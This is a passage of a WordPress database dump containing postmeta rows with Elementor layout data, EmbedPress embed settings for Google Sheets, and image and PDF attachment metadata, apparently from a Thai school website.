again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4380,1577,'_elementor_edit_mode','builder'),
(4381,1577,'_elementor_template_type','wp-post'),
(4382,1577,'_elementor_version','3.29.2'),
(4383,1577,'_wp_page_template','default'),
(4384,1577,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[],\"isInner\":false}]'),
(4386,1578,'_elementor_edit_mode','builder'),
(4387,1578,'_elementor_template_type','wp-post'),
(4388,1578,'_elementor_version','3.29.2'),
(4389,1578,'_wp_page_template','default'),
(4390,1578,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[],\"isInner\":false}]'),
(4392,1579,'_elementor_edit_mode','builder'),
(4393,1579,'_elementor_template_type','wp-post'),
(4394,1579,'_elementor_version','3.29.2'),
(4395,1579,'_wp_page_template','default'),
(4396,1579,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[],\"isInner\":false}]'),
(4398,1580,'title_style','default'),
(4399,1580,'_title_style','field_5d1a0217cf408'),
(4400,1581,'_elementor_edit_mode','builder'),
(4401,1581,'_elementor_template_type','wp-post'),
(4402,1581,'_elementor_version','3.29.2'),
(4403,1581,'_wp_page_template','default'),
(4404,1581,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[],\"isInner\":false}]'),
(4408,1571,'_edit_last','1'),
(4409,1571,'title_style','default'),
(4410,1571,'_title_style','field_5d1a0217cf408'),
(4411,1581,'title_style','default'),
(4412,1581,'_title_style','field_5d1a0217cf408'),
(4413,1582,'_elementor_edit_mode','builder'),
(4414,1582,'_elementor_template_type','wp-post'),
(4415,1582,'_elementor_version','3.29.2'),
(4416,1582,'_wp_page_template','default'),
(4417,1582,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[],\"isInner\":false}]'),
(4421,1583,'_elementor_edit_mode','builder'),
(4422,1583,'_elementor_template_type','wp-post'),
(4423,1583,'_elementor_version','3.29.2'),
(4424,1583,'_wp_page_template','default'),
(4425,1583,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[],\"isInner\":false}]'),
(4429,1584,'_elementor_edit_mode','builder'),
(4430,1584,'_elementor_template_type','wp-post'),
(4431,1584,'_elementor_version','3.29.2'),
(4432,1584,'_wp_page_template','default'),
(4433,1584,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4437,1585,'_elementor_edit_mode','builder'),
(4438,1585,'_elementor_template_type','wp-post'),
(4439,1585,'_elementor_version','3.29.2'),
(4440,1585,'_wp_page_template','default'),
(4441,1585,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4443,1586,'_elementor_edit_mode','builder'),
(4444,1586,'_elementor_template_type','wp-post'),
(4445,1586,'_elementor_version','3.29.2'),
(4446,1586,'_wp_page_template','default'),
(4447,1586,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4449,1587,'_elementor_edit_mode','builder'),
(4450,1587,'_elementor_template_type','wp-post'),
(4451,1587,'_elementor_version','3.29.2'),
(4452,1587,'_wp_page_template','default'),
(4453,1587,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/17ngXMYbWSYd2IQIXTR7A80Xfbp7sbY0g\\/edit?gid=101226550#gid=101226550\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4465,1589,'_elementor_edit_mode','builder'),
(4466,1589,'_elementor_template_type','wp-post'),
(4467,1589,'_elementor_version','3.29.2'),
(4468,1589,'_wp_page_template','default'),
(4469,1589,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/17ngXMYbWSYd2IQIXTR7A80Xfbp7sbY0g\\/edit?gid=101226550#gid=101226550\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4472,1590,'_elementor_edit_mode','builder'),
(4473,1590,'_elementor_template_type','wp-post'),
(4474,1590,'_elementor_version','3.29.2'),
(4475,1590,'_wp_page_template','default'),
(4476,1590,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/17ngXMYbWSYd2IQIXTR7A80Xfbp7sbY0g\\/edit?gid=101226550#gid=101226550\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4479,1591,'_elementor_edit_mode','builder'),
(4480,1591,'_elementor_template_type','wp-post'),
(4481,1591,'_elementor_version','3.29.2'),
(4482,1591,'_wp_page_template','default'),
(4483,1591,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz\\/edit?usp=sharing&ouid=116408890257525538205&rtpof=true&sd=true\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4486,1592,'_elementor_edit_mode','builder'),
(4487,1592,'_elementor_template_type','wp-post'),
(4488,1592,'_elementor_version','3.29.2'),
(4489,1592,'_wp_page_template','default'),
(4490,1592,'_elementor_data','[{\"id\":\"8d18942\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"d98e4f2\",\"elType\":\"widget\",\"settings\":{\"embedpress_embeded_link\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz\\/edit?usp=sharing&ouid=116408890257525538205&rtpof=true&sd=true\",\"prefix_nftcreator\":\"Created By\",\"prefix_nftprice\":\"Current Price\",\"prefix_nftlastsale\":\"Last Sale\",\"label_nftbutton\":\"See Details\",\"loadmorelabel\":\"Load More\",\"label_nftrank\":\"Rank\",\"label_nftdetails\":\"Details\",\"instafeedFollowBtnLabel\":\"Follow\",\"instafeedPostsCountText\":\"[count] posts\",\"instafeedFollowersCountText\":\"[count] followers\",\"instafeedPopupFollowBtnLabel\":\"Follow\",\"instafeedLoadmoreLabel\":\"Load More\",\"cPopupButtonText\":\"Schedule time with me\",\"adWidth\":\"300\",\"adHeight\":\"200\",\"adStart\":\"5\",\"adSkipButtonAfter\":\"5\",\"embedpress_protection_message\":\"You do not have access to this content. Only users with the following roles can view it: [user_roles].\",\"embedpress_lock_content_error_message\":\"Oops, that wasn\'t the right password. Try again.\",\"embedpress_password_placeholder\":\"Password\",\"embedpress_submit_button_text\":\"Unlock\",\"embedpress_submit_Unlocking_text\":\"Unlocking...\",\"embedpress_lock_content_heading\":\"Content Locked\",\"embedpress_lock_content_sub_heading\":\"Content is locked and requires password to access it.\",\"embedpress_lock_content_footer_message\":\"In case you don\'t have the password, kindly reach out to content owner or administrator to request access.\",\"width\":{\"unit\":\"px\",\"size\":1500,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"embedpres_elementor\"}],\"isInner\":false}]'),
(4494,1592,'title_style','default'),
(4495,1592,'_title_style','field_5d1a0217cf408'),
(4496,1594,'_edit_lock','1751427554:1'),
(4497,1595,'_wp_attached_file','2025/07/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา.pdf'),
(4498,1595,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:556690;}'),
(4499,1594,'_edit_last','1'),
(4500,1594,'title_style','default'),
(4501,1594,'_title_style','field_5d1a0217cf408'),
(4502,1596,'title_style','default'),
(4503,1596,'_title_style','field_5d1a0217cf408'),
(4504,1597,'title_style','default'),
(4505,1597,'_title_style','field_5d1a0217cf408'),
(4506,1598,'title_style','hidden'),
(4507,1598,'_title_style','field_5d1a0217cf408'),
(4508,1599,'title_style','hidden'),
(4509,1599,'_title_style','field_5d1a0217cf408'),
(4510,1600,'_wp_attached_file','2025/07/Green-Clean-Corporate-Organizational-Chart.png'),
(4511,1600,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:54:\"2025/07/Green-Clean-Corporate-Organizational-Chart.png\";s:8:\"filesize\";i:415299;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"Green-Clean-Corporate-Organizational-Chart-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:61539;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"Green-Clean-Corporate-Organizational-Chart-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26568;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"Green-Clean-Corporate-Organizational-Chart-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:283028;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"Green-Clean-Corporate-Organizational-Chart-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66004;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4512,1601,'title_style','default'),
(4513,1601,'_title_style','field_5d1a0217cf408'),
(4514,1602,'_wp_attached_file','2025/07/Green-Clean-Corporate-Organizational-Chart-1.png'),
(4515,1602,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:56:\"2025/07/Green-Clean-Corporate-Organizational-Chart-1.png\";s:8:\"filesize\";i:415299;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:56:\"Green-Clean-Corporate-Organizational-Chart-1-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:61539;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:56:\"Green-Clean-Corporate-Organizational-Chart-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:26568;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:56:\"Green-Clean-Corporate-Organizational-Chart-1-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:283028;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:56:\"Green-Clean-Corporate-Organizational-Chart-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66004;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4516,1603,'title_style','hidden'),
(4517,1603,'_title_style','field_5d1a0217cf408'),
(4518,1603,'banner',''),
(4519,1603,'_banner','field_5d1a0350fc654'),
(4520,1603,'banner_blur','20'),
(4521,1603,'_banner_blur','field_5d1a0527f6a99'),
(4522,1603,'banner_opacity','0.7'),
(4523,1603,'_banner_opacity','field_5d1a1731cd08c'),
(4524,1603,'headline_title',''),
(4525,1603,'_headline_title','field_5d551d91f7c04'),
(4526,1603,'headline_subtitle',''),
(4527,1603,'_headline_subtitle','field_5d551d9ff7c05'),
(4528,1604,'_wp_attached_file','2025/07/5-1.png'),
(4529,1604,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:15:\"2025/07/5-1.png\";s:8:\"filesize\";i:14256;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4531,1606,'_wp_attached_file','2025/07/6.png'),
(4532,1606,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:13:\"2025/07/6.png\";s:8:\"filesize\";i:8314;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4533,1607,'title_style','default'),
(4534,1607,'_title_style','field_5d1a0217cf408'),
(4535,1608,'_wp_attached_file','2025/07/comment.png'),
(4536,1608,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:19:\"2025/07/comment.png\";s:8:\"filesize\";i:12477;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4537,1609,'title_style','default'),
(4538,1609,'_title_style','field_5d1a0217cf408'),
(4540,1611,'_edit_lock','1751872866:1'),
(4541,1611,'_edit_last','1'),
(4542,1611,'title_style','default'),
(4543,1611,'_title_style','field_5d1a0217cf408'),
(4544,1612,'title_style','default'),
(4545,1612,'_title_style','field_5d1a0217cf408'),
(4546,1613,'title_style','default'),
(4547,1613,'_title_style','field_5d1a0217cf408'),
(4548,1614,'_wp_attached_file','2025/07/5-2.png'),
(4549,1614,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:15:\"2025/07/5-2.png\";s:8:\"filesize\";i:14256;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4551,1616,'title_style','default'),
(4552,1616,'_title_style','field_5d1a0217cf408'),
(4554,1618,'title_style','default'),
(4555,1618,'_title_style','field_5d1a0217cf408'),
(4556,1619,'title_style','default'),
(4557,1619,'_title_style','field_5d1a0217cf408'),
(4558,1620,'_wp_attached_file','2025/07/Is-It-a-Gift-Instagram-Post.png'),
(4559,1620,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:300;s:4:\"file\";s:39:\"2025/07/Is-It-a-Gift-Instagram-Post.png\";s:8:\"filesize\";i:107648;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"Is-It-a-Gift-Instagram-Post-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16137;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"Is-It-a-Gift-Instagram-Post-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:126463;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10372;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:80666;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:39:\"Is-It-a-Gift-Instagram-Post-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:30191;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4560,1621,'title_style','hidden'),
(4561,1621,'_title_style','field_5d1a0217cf408'),
